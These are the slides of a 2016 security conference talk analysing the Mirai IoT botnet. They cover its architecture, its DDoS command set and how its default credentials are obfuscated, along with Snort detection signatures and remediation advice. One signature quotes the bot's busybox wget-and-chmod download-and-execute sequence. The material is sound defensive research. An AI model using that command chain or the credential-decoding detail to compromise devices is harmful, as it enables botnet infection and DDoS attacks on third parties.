Look Into The Future - Analyzing Mirai botnet - Mauritius 2016 FIRST TC Minoru Kobayashi Internet Initiative Japan Inc.
Who am I ? • Minoru Kobayashi • I work for “Internet Initiative Japan Inc.”. • IIJ is a Japanese ISP (We are the first commercial ISP in Japan). • CISSP • I’m a member of CSIRT called “IIJ - SECT”. • We are incident responders for our customer and our company. • Our jobs include… • Malware Analysis • Forensic Investigation • Incident Response and Handling • Developing and operating honeypot and web crawler system • Surveying malware and attacking technique trends • Hands-on Trainer, Speaker • Including Blackhat, FIRST, internal lecture for Japanese government and so on. • Writing reports for our quarterly report (called “IIR”) and blogs
What is Mirai Botnet ? • Distributed Denial of Service (DDoS) System • Infect to IoT devices via Telnet (23/tcp) • IoT device = Network Camera, Digital Video Recorder, Router, and so on. • Use dictionary attack (factory default passwords) • Mirai was used to attack “Krebs on Security” and “OVH” in late September. • Krebs on Security : 620Gbps • OVH : over 1Tbps • “Anna -senpai ” has released Mirai source code in early October, suddenly. • Anna-senpai is an author of Mirai.
What means “ Mirai ” ? • In Japanese, Mirai can be written as “ 未来 ”. These Kanji characters are pronounced “ Mirai ”. • “ 未来 ” means “the future” in English. So I gave a title to this presentation “Looking Into T he Future”.
BTW, Who is Anna-senpai ? • The source code release announce was posted on the hacking community “ Hackforums ”. • He(She?) used a Japanese animation character as his avatar and his handle name is “Anna -senpai ”. • I don’t know that name. Let’s google. Who is she?
Anna-senpai is … • Anna-senpai is the name of Japanese animation character. The story of this animation is a fictional future. • Anna-senapi (the author of Mirai) may be an animation Otaku. So, I think Anna-senpai called this malware Mirai. • Otaku is a Japanese slang. Synonym for a geek. • One more interested thing, the source code of Mirai contains some Russian strings. Therefore Anna-senpai or his/her related parties could be Russian-speaking people.
Mirai is Open Source now.
Dive to source code
Mirai Botnet System Architecture Scan Receiver Loader HTTP/TFTP Server Admin/User ④ Pass credentials C&C DB ⑧ Use Mirai via CLI/API ⑤ Send commands to ⑥ Request to download download Bot binary Bot binary ③ Report the IP address and credential ① Register Bot Victim Server ⑨ DDoS Attack IoT (Victim) ② Scan random IP addresses IoT (Bot) and Attempt to login ⑦ Execute Bot binary
Attack command list Attack ID Command Description 0 UDP flood udp 1 Valve source engine specific flood vse 2 DNS resolver flood using the targets domain, input IP is ignored dns 3 SYN flood syn 4 ACK flood ack 5 TCP stomp flood stomp 6 GRE IP flood greip 7 GRE Ethernet flood greeth 8 Proxy knockback connection (none) 9 UDP flood with less options. optimized for higher PPS udpplain 10 HTTP flood http Attack ID 8 is assigned, but not implemented.
Dive to source code again • Credentials of IoT device are hardcoded and obfuscated. • You can see this list at mirai/bot/scanner.c. • Mirai has 61 kinds of credentials. • Get to de-obfuscate, you have to XOR by 0x22.
Can I detect it ? • The answer is … YES !! • All the Mirai communications are NOT encrypted. So you can write IDS/IPS signatures easy. • You can see it like below: This traffic is a part of process 5. You can see “/bin/ busybox wget ” command.
Snort Signatures • Snort is one of most popular open source IDS/IPS. • You can write signatures to detect Mirai like below: • Register Bot (Process ① ) • alert tcp any any -> any 23 (msg:"Mirai Botnet: Register Bot with C&C"; flow:to_server,established; content:"|00 00 00 01|"; depth:4; sid:1000000; rev:1) • Send a command to Download Bot (Process ⑤ ) • alert tcp any any -> any [23,2323] (msg:"Mirai Botnet: Download Bot binary via Telnet (wget)"; flow:to_server,established; content:"/bin/busybox wget http://"; content:"/bins/mirai."; content:"-O - > dvrHelper|3b| /bin/busybox chmod 777 dvrHelper|3b| /bin/busybox ECCHI"; sid:1000070; rev:1) But attackers can easily modify these indicator of attack, so these may not detect new version or variants of Mirai. Be careful. All the Snort signature I wrote, will be published in our quarterly report IIR next issue (Vol.33).
Demo 1 Using Mirai
Demo 1 environment Scan Receiver Loader HTTP/TFTP Server Admin/User ④ Transfer credentials C&C DB ⑧ Use Mirai via CLI/API ⑤ Send commands to ⑥ Request to download download Bot binary Bot binary 192.168.153.10 ③ Report the successful IP address and credential ① Register Bot 192.168.153.100 Victim Server ⑨ DDoS Attack IoT (Victim) ② Scan random IP addresses IoT (Bot) and Attempt to login ⑦ Run Bot binary 192.168.153.20
Demo 2 Detect Mirai by Snort
How can you check your IoT device was infected ? 1. Check the number of access to 23/tcp and 2323/tcp. • Mirai Bot almost scans 23/tcp. But once in 10 times, scans 2323/tcp. • It always scans random IPs. Therefore the number of access to these ports rise abruptly. 2. Check that you can access to management port. • You may not be able to the management port on IoT device (e.g. Telnet, SSH, WebUI, etc.). • Mirai kills the management processes on IoT device. • I believe it is to protect from other IoT bot malwares and to get high performance for DDoS. 3. Of course, you can also use Snort.
Conclusion • Check immediately whether your IoT device is infected. • To remove Mirai , just reboot it. It’s easy. • Change login password of IoT device. • Attackers already know the default password, because it is placed in online manual. • Don’t directly connect IoT devices to the Internet. • If you need to access from the Internet, you have to set up an access control list. • If possible, you have to use encrypted management protocols such as SSH/HTTPS.
Thank you
Recommend
More recommend
